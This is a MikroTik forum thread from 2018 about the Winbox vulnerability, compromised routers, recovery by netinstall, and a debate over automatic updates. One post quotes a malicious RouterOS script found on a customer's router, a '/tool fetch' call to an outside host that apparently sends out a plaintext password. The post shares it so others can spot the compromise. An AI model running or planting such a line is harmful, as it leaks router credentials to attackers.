But if you are running RouterOS v6.43, I don't even see how this is related to this topic at all. Change your password so people that may have hacked your router before can't access it again, and clean up any possible mischievous configuration or scripts. Then implement a more secure firewall and more secure remote access.

Either way, us sitting here and guessing doesn't help anyone. Best not to go too off-topic in this thread with assumptions and speculations. Email support@mikrotik.com and they will be able to help you more closely, or make a new thread so we can all discuss your issue better.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:35 am
by tiktakmik
Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?
No. Read everything from the beginning
I ask what kind of job running without any config on scheduler or watchdog.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:43 am
by normis
Sorry I don't understand that question. Try to re-phrase it.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:50 am
by Deantwo
Sorry I don't understand that question. Try to re-phrase it.
He is talking about what he said in viewtopic.php?p=685673#p685509, a job is shown to be running, yet the configuration doesn't appear to have any scripts in it.
But as I said, from the picture and config alone, I doubt we can't tell him what it is. Unless you happen to know anything else that appear in the job list than scripts.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:53 am
by normis
This is normal, if you open a Terminal. There is no hacker here.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:57 am
by tiktakmik
This is normal, if you open a Terminal. There is no hacker here.
I have another similar configuration of CHR (not previosly hacked). Before asking, I checked there and didn't see any jobs.
So I suspect a hacker backdoor.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 11:01 am
by tiktakmik
This is normal, if you open a Terminal. There is no hacker here.
ok. confirm this!


now we can go on to discuss the journey in winter

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 11:13 am
by Deantwo
This is normal, if you open a Terminal. There is no hacker here.
I feel stupid for forgetting this detail... knew I was forgetting something.
Anyway, thanks for the confirmation.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 13, 2018 7:02 pm
by wpeople
Just found this on a customer router (where winbox was open for world, running 6.42.3) in system/scripts

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx ... artextpass")}

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 9:09 pm
by spacemind
....

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 10:14 pm
by BartoszP
What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 10:29 pm
by spacemind
post deleted .... contacted support instead.

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 10:37 pm
by kobuki
What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?
One of a client's main router with ros 6.42.7 has been compromised and a lot of traffic was beeing generated before i replace it for a new one.

Ros 6.42.7 with only winbox port open to web, and the other network routers and access points including swos switches are all compromised except the ones with ros 6.18.

This crazy security holes....
I'm not advocating for Mikrotik but please stop this. It's very annoying and I'm really not sure if you're just trolling, speaking on behalf of a competitor or you have a genuine case of hacking. Tell us all details, like how you've checked there were no default empty or easy to guess passwords, proxy service or firewall rules enabled that make it easy to use the router as a starting point for hackers, etc. If you're not 100% positive the break-in is a result of a new security hole then you should consider removing your post and rethink what you post here. We're all here to share info on all the existing exploits and how to deal with them. If you happen to find a genuine one, make a support request with a supout file and file a support request instead.

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 11:01 pm
by spacemind
kobuki i'm using Mikrotik since version 2, i watched the huge improvement in Mikrotik hardware. I have thousands of deployed mikrotik networks since 2001.

thank you for your sugestion but i'm getting a bit tired of this magnific hardware with crazy and buggy software.

I replaced a few hacked routers and will investigate whats happened.

Bye :)
R.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 16, 2018 9:18 pm
by zvekyf
is there maybe a plan to add auto update option and set that as default option?
There are many routers which will never be updated or until something real bad happens.

Also maybe to add option to auto update only security fixes.

This way every router will be immediately patched/updated(unmanaged) and IT folks(managed) can select manual updates but set auto update for security fixes.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 10:51 am
by Deantwo
is there maybe a plan to add auto update option and set that as default option?
There are many routers which will never be updated or until something real bad happens.
The issue with doing that is that users won't know what is happening.
For example if they notice their internet going down their first instinct might be to reboot the router. Rebooting the router while in it is in the middle of installing an upgrade might break the router. And the aveage user will not want to learn how to use NetInstall.

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
All it takes is a simple scheduler script to make it auto update, and if you make it use the "bugfix"/"long-term" channel it will only update when it is an important update.

Maybe an example of such an auto update scheduler script should be added to the wiki/manual?

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 11:07 am
by mrz

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 11:27 am
by Deantwo
Example is already in the manual:
https://wiki.mikrotik.com/wiki/Manual:U ... to-upgrade
Ah very nice, thanks.
But it would be nice if the example also included "set channel=bugfix", since that took me a moment to find. I can't even see the word "channel" being mentioned at all on the whole page.

For example:
/system package update
set channel=bugfix
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available" ) do={ install }

EDIT: Appears to be called "release chains" on the page, here: https://wiki.mikrotik.com/wiki/Manual:U ... ase_chains

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 11:57 am
by spacemind

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you'r wrong, It is MIKROTIK job to update our router's software when critical vulnerability is on the way.

If we buy mikrotik powerfull routers we must have this critical support.

Try to buy a Tesl.... car or other smart car with this kind of critical vulnerability and have them to tell you that you need to update the software by yourself ( and its your problem if you didn't update it...)

Best Regards
R.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 12:27 pm
by normis
I disagree. It is the job of the administrator to configure the device securerly, and then decide when to upgrade. MikroTik can't reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn't affect anyone that has the default firwall, or has configured his own firewall correctly.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 12:32 pm
by sid5632

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you'r wrong, It is MIKROTIK job to update our router's software
No, it you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:02 pm
by spacemind

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you'r wrong, It is MIKROTIK job to update our router's software
No, it you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.
Oh... Am i wrong ? ROS has bugs, but its not windows 10, its much better, and dont forget that Mikrotik is selled all aroud the world to end customers.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:16 pm
by mrz
How happy would you be if Tesla would suddenly reboot and try to upgrade in a middle of slippery mountain road with a lot of dangerous turns?

Router is supposed to work 24/7 and it is not possible to guess what would be convenient time for each customer to upgrade and have network downtime.
That is why network administrators exist to administer network, upgrade routers or set up upgrade scripts scheduled for most convenient time.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:22 pm
by spacemind
I disagree. It is the job of the administrator to configure the device securerly, and then decide when to upgrade. MikroTik can't reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn't affect anyone that has the default firwall, or has configured his own firewall correctly.
Normis,

Securely ? I only have winbox access opened to WAN and with different port than default one.

We can have an upgrade menu where we can choose if we want the critical, (extreme critical in this case) upgrades done in auto mode. That option can be disabled by default.

This would solve critical vulnerability issues, upgrade, reboot and notify client. I know that some updates are buggy and we will have problems, but in my opinion i prefer to have an upgrade with some bugs even if a hotspot/pppoe server stops working with 5000 clients than have router hacked....

thanks.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:24 pm
by normis
Securely ? I only have winbox access opened to WAN and with different port than default one.
So it means you can keep using it without worry, and there is no urgent need for the manufacturer to force upgrade your device.
Also, how could we upgrade it, if you have a firewall.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:32 pm
by spacemind
How happy would you be if Tesla would suddenly reboot and try to upgrade in a middle of slippery mountain road with a lot of dangerous turns?

Router is supposed to work 24/7 and it is not possible to guess what would be convenient time for each customer to upgrade and have network downtime.
That is why network administrators exist to administer network, upgrade routers or set up upgrade scripts scheduled for most convenient time.

Tesla Car should go to a safe place/shop in auto mode, stop, do the critical updade, notify the client and contact tesla support to check with the client has we are talking about a 160.000€ car .... what do you think ?

A simple menu were you can choose if you want to do the critical updates and reboot is enough for that, network admins do whatever they think is better, but end customers should be protected, Mikrotik sells thousands of unis to end customers, not only for companies.

anyway this conversation will not help in the future, a new feature sugestion will do the work.

thanks for your comments guys :)

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:38 pm
by spacemind
Securely ? I only have winbox access opened to WAN and with different port than default one.
So it means you can keep using it without worry, and there is no urgent need for the manufacturer to force upgrade your device.
Also, how could we upgrade it, if you have a firewall.
That´s why i choosed Mikrotik since 2001, to use it without worries, i am not a Sys Admin, i just show to clients and friends the best affordable equippment on market with the best software to manage it and i´m happy to have Mikrotik.

Firewall rules can be changed if there is an upgrade menu :)

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:47 pm
by normis
You can already do it.

In system scheduler, add new entry that does this every 24 hours or whenever:
/system package update
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available") do={ install }
https://wiki.mikrotik.com/wiki/Manual:U ... to-upgrade

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 4:37 pm
by Cha0s
Tesla Car should go to a safe place/shop in auto mode, stop, do the critical updade, notify the client and contact tesla support to check with the client has we are talking about a 160.000€ car .... what do you think ?
I think that I wouldn't want my 160.000€ car to stop whenever it feels like it should update itself, while I am in a rush to get my pregnant wife or my hurt child to the hospital.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 5:57 am
by OhJeez
Automatic upgrade should be the default and is quickly becoming best practice.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 9:25 am
by normis
See above configuration line. It can't be default, because I don't know at what time you don't need any internet.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 9:43 am
by eddieb
NEVER make updates automatic !
We want to control the moment of update and rebooting devices.
The way it is done now is sufficient, announcements thru mailing and on this forum is fine.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 8:29 pm
by sid5632
Automatic upgrade should be the default
No, it should not.
and is quickly becoming best practice.
Only if you're using the Micro$oft definition of 'best', which really means worst.
Upgrading in a controlled manner is best practice, not when some bone-head elsewhere in the world dictates.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 19, 2018 9:52 am
by Karas
Automatic upgrade should be the default
No, it should not.
and is quickly becoming best practice.
Only if you're using the Micro$oft definition of 'best', which really means worst.
Upgrading in a controlled manner is best practice, not when some bone-head elsewhere in the world dictates.
I think its unfair to call Mikrotik bone-heads in this case, as they are also saying no to the automatic upgrades. :lol:
Srsly tho, I agree, it should be up to the Network Admin to decide when updates should take place, not rely on someone else to decide when the network will go offline.
Especially when some releases have come out buggy at times, which is why its often better to wait a couple of days for forum/community feedback and/or test the release yourself before implementing.

@OhJeez - try controlling a network with hundreds of Mikrotik devices on it, and have someone else decide when upgrades should take place instead of you.
And then have the upgrade be to a buggy release.
Have fun,

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 19, 2018 10:27 am
by Cha0s
I think its unfair to call Mikrotik bone-heads in this case, as they are also saying no to the automatic upgrades. :lol:
I don't think he meant Mikrotik but the likes of Microsoft and their stupid forced updates.

Another example is Dropbox. It upgrades whenever it feels like it. No notification, no mention of it anywhere.
It's borderline backdoor/malware behavior.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 19, 2018 8:54 pm
by sid5632
I don't think he meant Mikrotik but the likes of Microsoft and their stupid forced updates.
It is indeed Micro$oft I meant.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 11:07 am
by mrz
Even your "beloved" Microsoft does not force reboots. You choose when to reboot the PC.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 11:16 am
by andriys
Even your "beloved" Microsoft does not force reboots.
In Windows 10 it does, actually.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 11:18 am
by mrz
No it does not, unless you scheduled automatic restarts.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 12:41 pm
by karlisi
In some cases Windows 10 forces user to restart computer not letting to do anything else. It's almost the same, except if user wants to sit and look at smth like "You must restart Your computer to finish important update" forever.
It's offtopic, imho. Mikrotik should not change upgrade to automatic by default, period. But if upgrade process would check firewall rules for unsafe entries on every upgrade, and warn the user afterwards (in log, on terminal, dialog box like after config reset), it would be helpful for inexperienced users.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 12:58 pm
by andriys
No it does not, unless you scheduled automatic restarts.
It's getting a bit off-topic, but still. The default behavior of Windows 10 is to always install updates automatically as soon as they become available, and then force automatic reboot somewhen outside of a (somewhat) configurable "activity period". You can configure this activity period (with limitations), but that's it. Nothing else can be changed/configured unless you are using Pro or Enterprise edition, and even then you need to know how to use policy editor and what policy to tweak in order to prevent automatic updates to happen without user consent.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 1:40 pm
by mrz
would check firewall rules for unsafe entries on every upgrade
What is considered unsafe entry? And how would you determine that particular entry is unsafe in specific firewall?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 2:34 pm
by karlisi
would check firewall rules for unsafe entries on every upgrade
What is considered unsafe entry? And how would you determine that particular entry is unsafe in specific firewall?
Everything outside default protection rules. It should be only warning, nothing else.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 2:46 pm
by Cha0s
Everything outside default protection rules. It should be only warning, nothing else.
So, everyone else that does not use the default firewall will get annoying warnings about a supposedly insecure firewall configuration?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 3:14 pm
by mkx
Everything outside default protection rules. It should be only warning, nothing else.
So, everyone else that does not use the default firewall will get annoying warnings about a supposedly insecure firewall configuration?
No, not everybody. Only those who care enough to check their router from time to time. Those that don't care even to upgrade ancient unsafe ROS versions won't be bothered about it.

I find red-coloured log entry about CPU not running at default frequency (even if downclocked so it should be harmless to hardware) annoying as well, but I have to live with it.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 3:23 pm
by Cha0s
So, us, professional users of ROS, that use it every day, should have to get stupid warnings, because of dummy users that mess up their firewall and never even bother to login to their routers ever again.

Who exactly will this message be for then?

Please. Stop trying to convert RouterOS to a 'DummyOS'. If you need wizards, bells and whistles to the likes of Netgear and D-Link, then by all means. Get a D-Link.

RouterOS is a system for power users and professionals. Not for dummy users.

Do you expect Cisco to put warnings and auto update features? You know that when pay thousands of dollars for a Cisco, you have to know what you are doing to use it. You don't expect Cisco to babysit you in case you mess up your configuration.

Why should RouterOS be any different? Because it's cheap?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 3:27 pm
by mkx
So, us, professional users of ROS, ...
See how your own position is skewing your point of view? :wink:

Seriously: even being myself a "home user" by all standards I'm with you on this.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 9:09 am
by WestTexas
I have several clients that still have 6.38.5 and were compromised this weekend.
New firmware file have been uploaded, but is ignored when it reboots. It remains in the file list and the log just shows 'router rebooted'.
I have tried several firmware versions including 6.42.3.
I have also reset the configuration then tried new firmware. It still fails to take the new firmware.

Any suggesions?

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 10:24 am
by mkx
Verify that uploaded npk file is intended for correct platform.

Check the list of installed packages. If there's a package listed more than once, upgrade won't succeed and the only remedy is to perform netinstall.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 5:43 pm
by WestTexas
Thanks mkx
It's the right version, and has been placed on several unaffected routers and installed normally.
No errors, just shows 'router rebooted' in the log and the file remains.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 6:07 pm
by mkx
There are two wireless packages installed. Try to uninstall wireless-cm2 (this might not be possible if it's part of bundle).
Other than that, I'd try to upgrade first to 6.40.9 (you might be able to perform that without downloading package, change package channel to bugfix only) ... that's the last version with old "master port" configuration. Then upgrade to 6.42.x to have upgrade process translate "master port" to "new bridge". After that upgrade to 6.43.2. And don't forget to upgrade firmware at every step (/system routerboard upgrade).

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 8:30 pm
by spacemind
I have several clients that still have 6.38.5 and were compromised this weekend.
New firmware file have been uploaded, but is ignored when it reboots. It remains in the file list and the log just shows 'router rebooted'.
I have tried several firmware versions including 6.42.3.
I have also reset the configuration then tried new firmware. It still fails to take the new firmware.

Any suggesions?
Hi,

I have faced same issue, the solutions is:

Netinstall all afected devices 6.43.2 with no default configuration and configure everything from scratch...

After i discovered a few afected routers i first turned off all remote access, winbox, telnet... uploaded 6.42.3 file, rebooted but no upgrade was done, so my solution is below and i got everything worked except a few boards where the LTE card stopped to work even after upgrade and reboot. (Had to buy new lte routers to replace for those minipci e cards)


Best regards

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 01, 2018 11:36 am
by Deantwo
WestTexas:
In theory, if you can't upgrade the routers at all, just make sure they can't be accessed from untrusted networks. The vulnerability is only an issue if it can be accessed in the first place.
For example make them only accept WinBox connections from your specific public IP range. Or make all routers have a SSTP tunnel for maintenance access.

It is still recommended to upgrade to the newer RouterOS version, but you can at least eliminate the threat of this vulnerability by just improving your firewall to prevent access from untrusted networks.

PS: Be sure to scrub the routers for any mischievous configuration or scripts.

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 8:55 am
by ssbaksa
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue warning about down time. Some environments depend on
equipment which is 24/7/365 up.
Not every one have Mikrotik in home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:20 am
by pe1chl
Maybe MikroTik or one of the expert scripting users could post a script that changes the firewall filter rules of a router to the new default firewall.
The script that adds that is of course already available in the router but it does a lot of other things.
Some users might not be prepared to reset their entire config but their firewall is not so complicated and it could easily be replaced with the new one.
(especially as there are now some rules that make it unnecessary to add specific rules to the filter after having configured dst-nat and IPsec)

The script would create the new WAN and LAN interface lists, populate them, remove all current firewall filter rules and install the default rules.
The user would then have to customize it in special cases, but for the average "NAT router with some forwardings and VPNs" it would just work.

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:30 am
by pe1chl
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue warning about down time. Some environments depend on
equipment which is 24/7/365 up.
But then you don't understand what "default" means?
Default does not mean it is happening all the time. It is a setting that is automatically made and is useful for many, but
can be changed by individual users with different requirements.

I am all for a default automatic upgrade, but it should use a separate release channel so that routers are not blindly following the
stable or even long-term channels. We all know that every 6.xx version is immediately followed up with 6.xx.1 and 6.xx.2 to fix
major mishaps, and automatic upgrade should not suffer from that, or users will disable it just to have less issues.
Automatic upgrade should install a version that is known to be reliable (has been online for at least a month without showstopping
issues, with the exception of one well-tested and localized fix for a vulnerability) and its version should only change when major
problems have been found like recently.

It prevents the current situation where there will be 100.000 vulnerable routers on internet for at least a decade, and we will
read those alarming security notices from yet another group who have found yet another exploit every month.

You with your 24/7/365 up are of course watching the security situation and act accordingly. But the average user isn't,
and default automatic upgrade is a good solution for that.

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:33 am
by normis
pe1ch, do you think this script in a scheduler rule would be a good idea? the scheduler time could be determined by the user (or disabled):
/system package update
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available") do={ install }
we could add this into our iOS/Android application wizard mode.

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:52 am
by normis
Maybe MikroTik or one of the expert scripting users could post a script that changes the firewall filter rules of a router to the new default firewall.
The script that adds that is of course already available in the router but it does a lot of other things.
Some users might not be prepared to reset their entire config but their firewall is not so complicated and it could easily be replaced with the new one.
(especially as there are now some rules that make it unnecessary to add specific rules to the filter after having configured dst-nat and IPsec)

The script would create the new WAN and LAN interface lists, populate them, remove all current firewall filter rules and install the default rules.
The user would then have to customize it in special cases, but for the average "NAT router with some forwardings and VPNs" it would just work.
I think this already exists:

1. upgrade to latest
2. system reset

This will load the new default config and the user will just need to re-create his PPPoE client

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 12:32 pm
by pe1chl
Normis:
1. about auto upgrade: yes, but it should be installed by default in new routers and it should use a dedicated release channel only for security fixes like those that fixed the winbox and webserver vulnerabilities.
2. about firewall: what I suggest fixes only the firewall filters without overwriting all other configuration, which may be easier to convince the users to do.

Re: Winbox vulnerability: please upgrade

Posted: Wed Oct 10, 2018 6:28 pm
by briefwum
Thanks for the link.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 4:47 pm
by usmany
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Normis and Others in the forum, I upgraded my router os from v6.41 to v6.43.2 and winbox v3.18. I am been hacked by an attacker.

What is your take here!

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 4:51 pm
by BartoszP
Have you netinstalled?

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 4:58 pm
by usmany
Have you netinstalled?
Yes, I netinstalled on Friday. Today Monday i connect remotely to the office twice, from that 2 connection, now i can not connect back again. Telling me wrong username/password. I am sure the attacker sniffed the login detail again to put me out again.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 5:25 pm
by pe1chl
Have you netinstalled?
Yes, I netinstalled on Friday. Today Monday i connect remotely to the office twice, from that 2 connection, now i can not connect back again. Telling me wrong username/password. I am sure the attacker sniffed the login detail again to put me out again.
You should not allow remote connection to the router admin interface from the entire internet. That is just asking for trouble. The default firewall does not allow that, please do not remove that rule.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 5:52 pm
by Karas
Have you netinstalled?
Yes, I netinstalled on Friday. Today Monday i connect remotely to the office twice, from that 2 connection, now i can not connect back again. Telling me wrong username/password. I am sure the attacker sniffed the login detail again to put me out again.
Just to confirm the (hopefully) obvious, you did use a different password afterwards, right?
And as pe1chl said, did you block the remote access?

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 11:21 pm
by spacemind
Normis:
1. about auto upgrade: yes, but it should be installed by default in new routers and it should use a dedicated release channel only for security fixes like those that fixed the winbox and webserver vulnerabilities.
2. about firewall: what I suggest fixes only the firewall filters without overwriting all other configuration, which may be easier to convince the users to do.
+1 for dedicated release channel for security fixes and auto upgrade option menu to enable/disable.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 11:28 pm
by spacemind
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Normis and Others in the forum, I upgraded my router os from v6.41 to v6.43.2 and winbox v3.18. I am been hacked by an attacker.

What is your take here!

Finally someone had same problems like me lol...

The only way that i had to solve this was:

1- Netinstall
2- Remove default configuration
3- Manually configure everything and voilá!
4- disable ip/services that you will not be using (ftp, telnet....)
(DO NOT USE SAME USERNAME/PASSWORD FOR WINBOX)

already done it in 150+ devices ...

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 22, 2018 12:26 pm
by Kraken2k
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue warning about down time. Some environments depend on
equipment which is 24/7/365 up.
Not every one have Mikrotik in home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,
I think that automatic upgrade could be in "default configuration" - if you do anything beyond average home configuration (like the example you described), first step with a new device is "remove default configuration" and then config the device from the very beginning, tailored to your needs.

Home users, who does not care much and leave the default config on (or those who does not understand/does not care) will get automatic updates and won't stay behind with old vulnerable versions. And these usually don't run the critical applications, that does not survive two or three minutes outage during the night hours.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 22, 2018 3:06 pm
by ssbaksa
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue warning about down time. Some environments depend on
equipment which is 24/7/365 up.
Not every one have Mikrotik in home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,
I think that automatic upgrade could be in "default configuration" - if you do anything beyond average home configuration (like the example you described), first step with a new device is "remove default configuration" and then config the device from the very beginning, tailored to your needs.

Home users, who does not care much and leave the default config on (or those who does not understand/does not care) will get automatic updates and won't stay behind with old vulnerable versions. And these usually don't run the critical applications, that does not survive two or three minutes outage during the night hours.
No, if that ever sees day light then it should be an "opt in" option with warning sign on first connect screen otherwise it should be as it is now.
That's my opinion based on 30 years of experience as system engineer/admin. I don't say it lightly.

Here, in country where I am from all home based routers CPE's are belonging to providers and are directly managed by them. If you use MT it will be in most cases behind their router with port forwarding enabled.

Br,
Sasa

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 22, 2018 3:51 pm
by pe1chl
No, if that ever sees day light then it should be an "opt in" option with warning sign on first connect screen otherwise it should be as it is now.
That's my opinion based on 30 years of experience as system engineer/admin. I don't say it lightly.
No, for it to be useful it HAS TO BE enabled by default!
Note that it is not targeted to system engineers/admins.
They can turn off such an option when they (think that they) know better.
But for the average home user a router is a buy-install-and-forget device and it has to be auto-updating or else it won't be updated ever.
Note that I do not advocate a situation where each router is following the release of every new version.
This auto-update should use a dedicated release channel that is only used to distribute critical fixes or well-tested new versions.
(the latter only to avoid situations where auto-updating systems are forced to make a big version jump in case a critical fix is made)

Re: Winbox vulnerability: please upgrade

Posted: Sat Oct 27, 2018 6:21 pm
by handlefman
Hello Mikrotik Community
I updated the router when I saw the news, but did not update the password. Now I can't hack my router to get access to it, what are the ideas?

current firmware version on hacked router 6.42.7

Can someone tell me the IP white address, which is registered on the hacked address for access to the router? (so that I could recreate the test environment for access)


please help me.

Re: Winbox vulnerability: please upgrade

Posted: Sat Oct 27, 2018 6:50 pm
by pe1chl
Just use netinstall to re-install and reset it and use your export or backup (from before it was hacked!) to reconfigure it.
Alternatively just reconfigure it manually.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 29, 2018 11:14 am
by Kraken2k
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue warning about down time. Some environments depend on
equipment which is 24/7/365 up.
Not every one have Mikrotik in home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,
I think that automatic upgrade could be in "default configuration" - if you do anything beyond average home configuration (like the example you described), first step with a new device is "remove default configuration" and then config the device from the very beginning, tailored to your needs.

Home users, who does not care much and leave the default config on (or those who does not understand/does not care) will get automatic updates and won't stay behind with old vulnerable versions. And these usually don't run the critical applications, that does not survive two or three minutes outage during the night hours.
No, if that ever sees day light then it should be an "opt in" option with warning sign on first connect screen otherwise it should be as it is now.
That's my opinion based on 30 years of experience as system engineer/admin. I don't say it lightly.

Here, in country where I am from all home based routers CPE's are belonging to providers and are directly managed by them. If you use MT it will be in most cases behind their router with port forwarding enabled.

Br,
Sasa
Just to be sure, I would like to say, that by " should be in default configuration" I don't mean "it should be default value". Yes, default value (when you erase configuration) should be "off", in "default configuration" (the factory default when you turn on the device for the first time) it imho should be "on".

The reason is simple: if you just connect the device to network and you don't care about config at all, it become a ticking bomb for the rest of the network - this is is the way how to partially fix this kind of behavior (as it happens, and you cannot do anything about it). It's similar thing to default configuration that forbids the logon from WAN port. If you reset the configuration (which is what we usually do after RoS/firmware update), the option for autoupdate will be set to "off" and you can configure it by yourself as you want.

Re: Winbox vulnerability: please upgrade

Posted: Mon Nov 05, 2018 11:00 pm
by CsXen
Hi.

if you just connect the device to network and you don't care about config at all, it become a ticking bomb for the rest of the network

Well... our good old RB532A's gets no security updates, because MT retired the MIPSLE branch. Not backporting any security update.
And the latests release (6.33.4) is vulnerable... so we backrolled to 6.27, which is virtually not vulnerable.
We have no chance to filter the WAN side, because the Android WinBox app over a mobile net is comes from "random" IP's.
And we have no funds to change the hardware, because they works on charity based on some very remote site.
What to do ? Should I blame MT for they ignorance ? Or just pray and hope, that no vulnerability will be found in the old 6.27 ?

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Mon Nov 05, 2018 11:45 pm
by caresss
With my total respect to Mikrotik let me tell you guys again that your ROS 6.43.4 is still vulnerable and tonight I was playing with the hacker by closing every single door to access my router. He was kind enough not to directly change my password and kick me out ... He was just playing with some mangle rules and using my gateway to increase the traffic through whatever he needs making my WAN graph full all the time.

Regardless of all, I locked all ip services and changed the default ports to something way so far from the original. Created a syslog dedicated to this mikrotik RB2011UiAS where I wanted to see what was going. Initially, the hacker was using my username to gain access again and to unbind the winbox and telnet from locking them to internet IP and not keeping them.

I realized that and rapidly deleted all users and created a totally new crazy user with a hard to guess password. In a sudden I was still in mikrotik session, tracing the log I saw him got in again through mac-telnet he scans what's changed and logs on back from winbox :| "Casper". (while using telnet nothing is logged it is the first time I know this!)

